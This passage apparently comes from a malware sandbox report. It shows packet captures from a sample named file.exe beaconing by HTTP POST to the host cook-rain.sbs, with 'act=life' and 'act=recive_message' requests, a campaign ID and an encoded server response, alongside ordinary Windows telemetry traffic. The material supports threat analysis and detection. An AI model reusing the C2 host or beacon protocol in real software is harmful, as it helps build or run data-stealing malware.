                                                                                                                                                                      Nov 21, 2024 06:23:37.069335938 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.069374084 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.069389105 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.070555925 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.070576906 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 21, 2024 06:23:37.187722921 CET1236INData Raw: d1 ec 41 5d dd 2e 04 2a 7d 8e 46 53 9c 1d 0e 2e b3 be e8 41 c0 51 2a 59 33 1b c9 3d 89 8b 75 8b 9e 40 ef 46 40 20 0a ab 75 2a c1 31 65 15 0a 3c c0 3e fb 42 aa a9 fd 0f 63 4e dd c6 a4 2c 7b 0e b3 3f 16 f7 7b 4e e2 a6 44 23 34 c7 a4 2c 7b a0 b1 3b
                                                                                                                                                                      Data Ascii: A].*}FS.AQ*Y3=u@F@ u*1e<>BcN,{?{ND#4,{;wNL>{$xl7ITNp>v\8yF |q1S5b%{HGAAx>1\k8q*)Ig]D>)dOB%#:5jiJCw2VyQgku\y0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      0192.168.2.64970940.113.103.199443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:11 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 64 37 4e 4d 6f 61 62 2b 30 43 58 39 54 42 6f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 39 63 38 62 31 39 62 64 32 37 31 39 33 63 64 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: Nd7NMoab+0CX9TBo.1Context: f9c8b19bd27193cd
                                                                                                                                                                      2024-11-21 05:23:11 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                      2024-11-21 05:23:11 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4e 64 37 4e 4d 6f 61 62 2b 30 43 58 39 54 42 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 39 63 38 62 31 39 62 64 32 37 31 39 33 63 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 72 79 47 49 6c 4b 61 41 6e 50 4f 46 75 6f 37 50 51 78 50 4e 74 7a 2f 55 50 53 70 47 64 79 36 48 49 54 55 4f 41 43 33 4e 76 34 6c 65 44 43 4b 77 6e 41 30 38 78 51 77 58 4f 6d 56 74 55 72 69 36 61 48 65 59 71 38 6d 50 64 46 34 6a 77 51 57 6d 37 79 4c 42 44 64 34 41 5a 52 38 41 6e 45 5a 4d 4f 4b 63 4f 5a 7a 4d 6f 41 2b 2f 62
                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Nd7NMoab+0CX9TBo.2Context: f9c8b19bd27193cd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXryGIlKaAnPOFuo7PQxPNtz/UPSpGdy6HITUOAC3Nv4leDCKwnA08xQwXOmVtUri6aHeYq8mPdF4jwQWm7yLBDd4AZR8AnEZMOKcOZzMoA+/b
                                                                                                                                                                      2024-11-21 05:23:11 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 64 37 4e 4d 6f 61 62 2b 30 43 58 39 54 42 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 39 63 38 62 31 39 62 64 32 37 31 39 33 63 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: Nd7NMoab+0CX9TBo.3Context: f9c8b19bd27193cd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                      2024-11-21 05:23:11 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                      2024-11-21 05:23:11 UTC58INData Raw: 4d 53 2d 43 56 3a 20 56 66 52 50 2b 63 33 79 67 55 69 30 7a 70 41 6c 35 4f 78 46 46 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                      Data Ascii: MS-CV: VfRP+c3ygUi0zpAl5OxFFw.0Payload parsing failed.


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.649710188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:14 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                      2024-11-21 05:23:15 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:15 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=6g3vr6qgeg7i6oktgenvr6rlsr; expires=Sun, 16-Mar-2025 23:09:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dxfX71AeSj32czPzZ6DCUZ0HaRv8TTOvdIF1YYbsuN8ol4bHy2OPY60s9%2BV3sDe0lLhMocFZd0zYOPTjXjcjJkfyexF1R29HZlAy%2B8joWomig49lu0Fz%2BdBywE7TvUi4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3f21197141b2-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1577&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1750599&cwnd=217&unsent_bytes=0&cid=de1eda623cb80d32&ts=805&x=0"
                                                                                                                                                                      2024-11-21 05:23:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                      2024-11-21 05:23:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.649711188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:16 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 53
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:16 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                      2024-11-21 05:23:17 UTC978INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:17 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=4ps1a2d365jpgepsjikh1ml0aj; expires=Sun, 16-Mar-2025 23:09:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N32mgOcCfpz1JS8vzsp%2FHn1cW92iSjXWTXJVAxl6R2op69eIYcG4vbjdXKLPxXHtif0MtDaMYABw5vkQ7v4NXaiW9qaVK6IvPD7CRCH%2BqVHc2l61WjxP8yQypskiSZRy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3f2e7b747277-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2085&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=950&delivery_rate=1428571&cwnd=236&unsent_bytes=0&cid=73a52ad0a0151a68&ts=753&x=0"
                                                                                                                                                                      2024-11-21 05:23:17 UTC391INData Raw: 34 34 36 63 0d 0a 64 77 39 78 47 75 47 48 5a 57 6c 42 72 59 43 54 36 46 37 49 52 58 4f 76 45 62 73 56 71 38 53 68 41 6b 62 36 2f 39 63 78 70 6c 6f 4d 4c 51 63 34 32 37 4e 4a 53 7a 4c 49 6f 71 6d 63 4c 4c 30 67 58 34 31 77 33 7a 65 52 6f 73 42 75 4e 5a 2f 54 39 55 66 4c 65 45 31 70 45 48 61 53 34 6b 6c 4c 4a 4e 57 69 71 62 4d 6c 36 69 41 64 6a 53 75 5a 63 4d 47 6d 77 47 34 6b 6d 35 53 34 51 63 6f 35 48 32 4d 57 63 6f 54 6b 41 51 67 74 77 4f 58 32 6a 54 2b 69 4b 78 72 43 65 64 59 33 68 2b 62 45 65 47 54 41 33 5a 70 55 30 6a 73 36 62 67 4a 78 77 2f 70 4a 45 6d 50 49 37 72 48 53 66 4b 6b 67 45 63 4e 33 33 33 37 44 72 4d 6c 6d 4a 5a 36 56 70 31 6a 41 4d 68 39 74 46 58 4f 4f 37 52 55 46 4a 38 66 75 38 49 63 2f 36 6d 6c 52 79 6d 75 5a 4c 34 6e 31 38 57 4d 31 69
                                                                                                                                                                      Data Ascii: 446cdw9xGuGHZWlBrYCT6F7IRXOvEbsVq8ShAkb6/9cxploMLQc427NJSzLIoqmcLL0gX41w3zeRosBuNZ/T9UfLeE1pEHaS4klLJNWiqbMl6iAdjSuZcMGmwG4km5S4Qco5H2MWcoTkAQgtwOX2jT+iKxrCedY3h+bEeGTA3ZpU0js6bgJxw/pJEmPI7rHSfKkgEcN3337DrMlmJZ6Vp1jAMh9tFXOO7RUFJ8fu8Ic/6mlRymuZL4n18WM1i
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 57 31 54 4e 73 50 69 48 30 74 37 6a 38 48 30 6d 6a 75 6d 4d 56 50 33 4d 38 59 35 30 4f 62 45 62 47 54 41 33 62 31 57 78 7a 73 65 59 68 42 77 69 50 63 48 47 53 58 43 35 2b 4f 4d 4f 61 51 74 45 74 39 35 31 33 48 4b 72 38 68 70 49 5a 2b 5a 39 52 32 45 50 77 30 74 53 7a 69 69 36 41 77 48 4b 64 6a 69 73 5a 56 79 73 32 63 57 77 54 4f 42 4e 38 32 6e 78 32 45 67 6c 70 4f 78 58 38 49 32 47 47 49 56 63 6f 50 69 44 51 4d 72 7a 75 2f 36 68 54 79 76 4b 68 58 4c 66 39 68 79 69 65 69 44 5a 7a 7a 59 78 66 56 39 77 7a 73 48 4c 79 5a 37 6a 65 73 41 48 57 50 51 72 4f 6a 4b 4f 36 5a 6e 53 59 31 39 33 48 6a 62 70 39 46 6c 4b 6f 71 52 73 46 58 4a 4f 78 74 74 46 6e 2b 4f 36 77 45 4d 49 4d 66 6d 38 49 51 77 6f 43 51 56 7a 6a 4f 58 4e 38 36 2b 67 7a 68 6b 71 5a 36 78 56 4e 59 37
                                                                                                                                                                      Data Ascii: W1TNsPiH0t7j8H0mjumMVP3M8Y50ObEbGTA3b1WxzseYhBwiPcHGSXC5+OMOaQtEt9513HKr8hpIZ+Z9R2EPw0tSzii6AwHKdjisZVys2cWwTOBN82nx2EglpOxX8I2GGIVcoPiDQMrzu/6hTyvKhXLf9hyieiDZzzYxfV9wzsHLyZ7jesAHWPQrOjKO6ZnSY193Hjbp9FlKoqRsFXJOxttFn+O6wEMIMfm8IQwoCQVzjOXN86+gzhkqZ6xVNY7
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 2b 48 36 51 34 47 4a 63 2f 6c 39 59 38 75 72 79 34 64 77 54 4f 58 4e 38 36 2b 67 7a 68 6b 74 35 71 6a 55 4f 73 37 42 47 52 54 5a 38 33 38 52 77 77 76 6a 37 71 78 6a 54 6d 69 4c 42 66 46 63 38 74 79 78 36 33 43 61 69 4b 5a 6b 4c 6c 56 78 44 6b 56 61 78 39 34 68 4f 49 56 47 53 62 4a 38 50 76 4b 63 75 6f 67 43 59 30 72 6d 55 48 5a 73 64 4a 32 5a 71 32 65 75 31 33 44 4c 6c 56 79 58 57 48 44 34 67 74 4c 65 34 2f 70 38 59 59 37 6f 69 45 56 78 58 7a 57 66 74 75 6e 7a 32 34 32 6e 35 32 38 58 63 73 30 48 47 41 55 64 59 6a 76 43 67 38 6b 7a 71 4b 2f 79 6a 75 79 5a 30 6d 4e 52 63 6c 36 78 59 6a 49 62 43 33 59 67 76 74 4b 68 44 38 5a 4c 55 73 34 68 2b 6b 50 41 53 7a 47 36 50 75 46 4e 61 6f 76 47 4d 52 77 32 58 76 50 70 38 39 73 4b 5a 32 65 73 46 37 42 4f 42 6c 71 46
                                                                                                                                                                      Data Ascii: +H6Q4GJc/l9Y8ury4dwTOXN86+gzhkt5qjUOs7BGRTZ838Rwwvj7qxjTmiLBfFc8tyx63CaiKZkLlVxDkVax94hOIVGSbJ8PvKcuogCY0rmUHZsdJ2Zq2eu13DLlVyXWHD4gtLe4/p8YY7oiEVxXzWftunz242n528Xcs0HGAUdYjvCg8kzqK/yjuyZ0mNRcl6xYjIbC3YgvtKhD8ZLUs4h+kPASzG6PuFNaovGMRw2XvPp89sKZ2esF7BOBlqF
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 48 55 32 50 44 34 66 32 43 4d 36 77 75 48 63 64 36 30 6e 76 43 6f 73 39 70 49 5a 36 63 73 46 62 46 50 42 6c 6e 46 58 75 41 36 67 67 45 4b 34 2b 73 73 59 30 6b 36 6e 39 52 36 47 54 53 65 63 2f 6d 33 43 34 39 32 4a 71 35 45 35 78 34 47 57 51 56 66 6f 62 70 42 67 30 72 79 75 72 31 69 7a 71 73 4a 42 37 4a 64 74 68 34 7a 61 72 4e 61 69 57 5a 6b 62 35 63 7a 7a 31 56 49 31 4e 2f 6d 36 56 66 53 78 4c 4d 39 4f 61 61 4d 4f 6f 34 58 39 51 7a 33 6e 75 4a 2f 6f 4e 68 4e 70 4b 58 75 31 62 4c 50 52 5a 69 46 48 57 46 36 51 30 43 4b 38 6e 74 2b 4a 67 2f 70 69 6b 57 77 33 2f 58 65 73 4f 6c 7a 69 42 71 32 4a 71 74 45 35 78 34 4f 57 6f 65 56 6f 6a 70 41 45 73 38 67 66 75 78 6a 54 44 71 66 31 48 42 65 64 56 2b 79 61 2f 47 61 43 2b 52 6d 4c 52 59 77 54 73 54 59 42 78 78 6b 65
                                                                                                                                                                      Data Ascii: HU2PD4f2CM6wuHcd60nvCos9pIZ6csFbFPBlnFXuA6ggEK4+ssY0k6n9R6GTSec/m3C492Jq5E5x4GWQVfobpBg0ryur1izqsJB7Jdth4zarNaiWZkb5czz1VI1N/m6VfSxLM9OaaMOo4X9Qz3nuJ/oNhNpKXu1bLPRZiFHWF6Q0CK8nt+Jg/pikWw3/XesOlziBq2JqtE5x4OWoeVojpAEs8gfuxjTDqf1HBedV+ya/GaC+RmLRYwTsTYBxxke
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 6a 2b 54 2b 67 7a 2b 6c 4a 68 6a 42 66 74 78 2b 7a 4b 66 46 5a 43 36 53 6e 62 4e 56 78 54 30 66 62 68 4a 79 69 75 49 50 44 43 44 64 6f 72 2f 4b 4f 37 4a 6e 53 59 31 61 33 6d 58 48 74 6f 4e 2f 61 6f 48 64 73 6c 2b 45 59 46 56 70 47 58 65 48 34 67 73 4e 4a 73 6e 76 38 49 55 39 71 69 67 56 78 6e 72 66 64 73 53 6a 7a 6d 51 32 6b 70 61 36 58 38 30 30 47 43 31 64 4f 49 54 39 52 31 4e 6a 2f 75 2f 2f 68 44 75 38 5a 77 36 44 61 70 6c 77 78 65 61 62 49 43 57 55 6b 72 5a 63 78 7a 73 55 5a 77 46 71 6a 2b 77 50 44 69 2f 45 37 50 65 59 4f 71 55 75 45 73 35 36 33 6e 2f 46 72 4d 42 6e 5a 4e 62 64 73 6b 75 45 59 46 56 4f 42 47 69 4f 70 52 68 46 4f 6f 2f 6c 2f 63 70 6b 36 69 38 63 78 58 6e 64 63 4d 53 68 78 57 6b 32 6b 5a 69 37 55 38 41 7a 47 6d 73 58 65 34 50 33 41 51 38
                                                                                                                                                                      Data Ascii: j+T+gz+lJhjBftx+zKfFZC6SnbNVxT0fbhJyiuIPDCDdor/KO7JnSY1a3mXHtoN/aoHdsl+EYFVpGXeH4gsNJsnv8IU9qigVxnrfdsSjzmQ2kpa6X800GC1dOIT9R1Nj/u//hDu8Zw6DaplwxeabICWUkrZcxzsUZwFqj+wPDi/E7PeYOqUuEs563n/FrMBnZNbdskuEYFVOBGiOpRhFOo/l/cpk6i8cxXndcMShxWk2kZi7U8AzGmsXe4P3AQ8
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 38 6f 37 73 6d 64 4a 6a 56 4c 43 64 4d 57 72 67 33 39 71 67 64 32 79 58 34 52 67 56 57 45 64 66 59 50 76 41 51 38 6d 79 65 6a 30 69 6a 65 70 4b 42 58 4c 64 39 5a 33 77 71 2f 43 5a 69 47 53 6c 72 4e 65 78 7a 34 54 4c 56 30 34 68 50 31 48 55 32 50 76 2b 66 79 47 4f 2b 6f 34 58 39 51 7a 33 6e 75 4a 2f 6f 4e 72 4b 4a 79 61 74 56 37 48 4d 42 42 70 47 58 32 44 37 52 55 44 49 38 6a 77 34 34 6f 31 72 79 73 53 7a 58 66 66 66 73 2b 6c 78 79 42 71 32 4a 71 74 45 35 78 34 4f 47 45 55 55 59 54 2b 52 78 52 74 31 71 4c 32 68 6e 7a 79 5a 78 44 47 65 64 5a 36 79 71 44 41 61 79 47 53 6e 4c 4a 62 79 53 6f 57 59 68 78 38 67 2b 6f 42 44 53 4c 41 35 50 61 44 50 61 49 67 55 59 4d 7a 33 6d 2b 4a 2f 6f 4e 4f 49 35 75 5a 39 55 79 4b 49 56 56 71 48 7a 6a 62 70 51 63 42 4b 63 58 73
                                                                                                                                                                      Data Ascii: 8o7smdJjVLCdMWrg39qgd2yX4RgVWEdfYPvAQ8myej0ijepKBXLd9Z3wq/CZiGSlrNexz4TLV04hP1HU2Pv+fyGO+o4X9Qz3nuJ/oNrKJyatV7HMBBpGX2D7RUDI8jw44o1rysSzXfffs+lxyBq2JqtE5x4OGEUUYT+RxRt1qL2hnzyZxDGedZ6yqDAayGSnLJbySoWYhx8g+oBDSLA5PaDPaIgUYMz3m+J/oNOI5uZ9UyKIVVqHzjbpQcBKcXs
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 52 6e 43 59 30 72 6d 55 4c 4b 71 4d 31 6e 4d 6f 6e 51 6b 6b 58 4f 50 77 56 71 42 48 66 44 71 30 63 4e 59 35 65 78 76 38 6f 34 75 32 64 4a 6e 53 47 43 49 70 72 78 6b 7a 49 37 31 6f 54 31 52 59 52 67 52 79 4e 54 61 73 4f 39 52 30 77 67 33 66 44 33 69 53 71 70 59 43 2f 7a 56 4d 4e 36 7a 37 48 53 58 68 71 66 68 37 68 56 30 79 6c 5a 65 42 42 32 6a 65 49 52 53 32 32 50 37 62 48 53 42 65 70 76 55 66 49 39 6d 57 2b 4a 2f 6f 4e 56 4a 35 61 54 73 6b 58 56 64 54 4a 33 48 6e 36 55 39 45 64 46 59 38 6d 69 71 64 70 79 36 69 4d 41 6a 53 75 4a 4a 5a 4c 7a 6b 44 64 30 79 6f 4c 37 53 6f 51 75 56 54 56 42 4e 73 50 33 52 31 4e 6a 69 4f 48 6a 6d 44 71 70 4d 52 4b 4b 54 65 64 5a 7a 71 44 47 5a 7a 54 61 73 37 35 48 77 33 68 62 4c 52 77 34 32 39 78 48 51 32 50 77 72 4c 47 53 66
                                                                                                                                                                      Data Ascii: RnCY0rmULKqM1nMonQkkXOPwVqBHfDq0cNY5exv8o4u2dJnSGCIprxkzI71oT1RYRgRyNTasO9R0wg3fD3iSqpYC/zVMN6z7HSXhqfh7hV0ylZeBB2jeIRS22P7bHSBepvUfI9mW+J/oNVJ5aTskXVdTJ3Hn6U9EdFY8miqdpy6iMAjSuJJZLzkDd0yoL7SoQuVTVBNsP3R1NjiOHjmDqpMRKKTedZzqDGZzTas75Hw3hbLRw429xHQ2PwrLGSf
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 63 4d 34 45 6e 6d 2f 32 57 4d 33 50 49 7a 36 6f 64 33 58 67 44 4c 55 73 71 7a 61 55 56 53 33 75 50 70 66 4b 59 4c 71 77 6b 42 38 34 30 35 30 6e 75 71 4d 52 68 4d 6f 69 4b 75 68 7a 71 44 6a 52 54 4c 57 32 41 36 77 6b 4d 4e 64 36 69 76 38 6f 7a 36 6e 38 6f 6a 54 75 5a 53 49 66 6d 32 79 42 38 32 4b 69 32 58 63 6f 2f 41 33 78 65 58 34 33 69 42 68 30 7a 32 4f 32 2b 70 41 71 4c 5a 31 2b 4e 64 5a 6b 76 6d 2b 69 44 5a 44 58 59 78 65 55 42 6e 32 31 47 4f 6b 4d 71 6e 4b 73 65 53 7a 57 50 75 71 50 45 66 4c 68 6e 53 59 30 30 32 6d 58 62 6f 4d 42 32 4a 39 2b 6a 69 33 54 4b 50 78 52 37 41 33 57 50 78 41 51 61 4b 66 48 63 35 49 6b 79 70 43 41 48 33 44 4f 58 4e 38 62 6d 6d 31 6c 6b 30 4e 32 4b 48 59 51 67 56 54 56 54 54 59 44 72 43 51 77 31 33 71 2f 57 68 44 75 72 4d 51
                                                                                                                                                                      Data Ascii: cM4Enm/2WM3PIz6od3XgDLUsqzaUVS3uPpfKYLqwkB84050nuqMRhMoiKuhzqDjRTLW2A6wkMNd6iv8oz6n8ojTuZSIfm2yB82Ki2Xco/A3xeX43iBh0z2O2+pAqLZ1+NdZkvm+iDZDXYxeUBn21GOkMqnKseSzWPuqPEfLhnSY002mXboMB2J9+ji3TKPxR7A3WPxAQaKfHc5IkypCAH3DOXN8bmm1lk0N2KHYQgVTVTTYDrCQw13q/WhDurMQ
                                                                                                                                                                      2024-11-21 05:23:17 UTC1369INData Raw: 64 49 6e 6f 67 33 68 6b 77 4e 32 59 51 63 4d 6f 46 69 38 2f 66 34 37 70 52 78 52 74 31 71 4c 6e 79 6d 54 35 61 56 48 66 4d 34 45 33 6a 71 58 52 63 69 4b 62 69 37 59 55 2b 67 59 34 66 78 52 6f 67 4b 63 32 42 69 66 5a 39 2f 4b 61 4f 35 51 5a 50 4e 39 30 79 58 53 4c 67 2f 6b 69 46 59 36 65 74 56 33 44 65 46 73 74 43 7a 6a 62 70 53 6f 5a 4a 4e 2f 68 73 36 38 47 36 42 59 48 7a 6e 50 58 63 49 6d 35 6a 58 6c 6b 6a 74 33 74 41 49 70 34 42 79 31 4c 4f 4d 54 72 43 67 6f 67 77 65 48 6a 6d 44 71 70 4d 52 4b 4b 54 65 64 59 77 71 66 54 62 54 57 56 6d 61 4e 74 2b 68 38 54 61 42 52 47 76 64 49 57 44 44 4f 4e 78 50 4b 63 50 2b 70 70 55 64 55 7a 67 54 66 75 6f 4d 5a 6e 5a 4e 62 64 73 52 4f 63 65 44 70 6d 45 6d 69 4f 39 41 6f 50 4e 59 33 46 39 34 38 37 36 6d 6c 52 77 54 4f
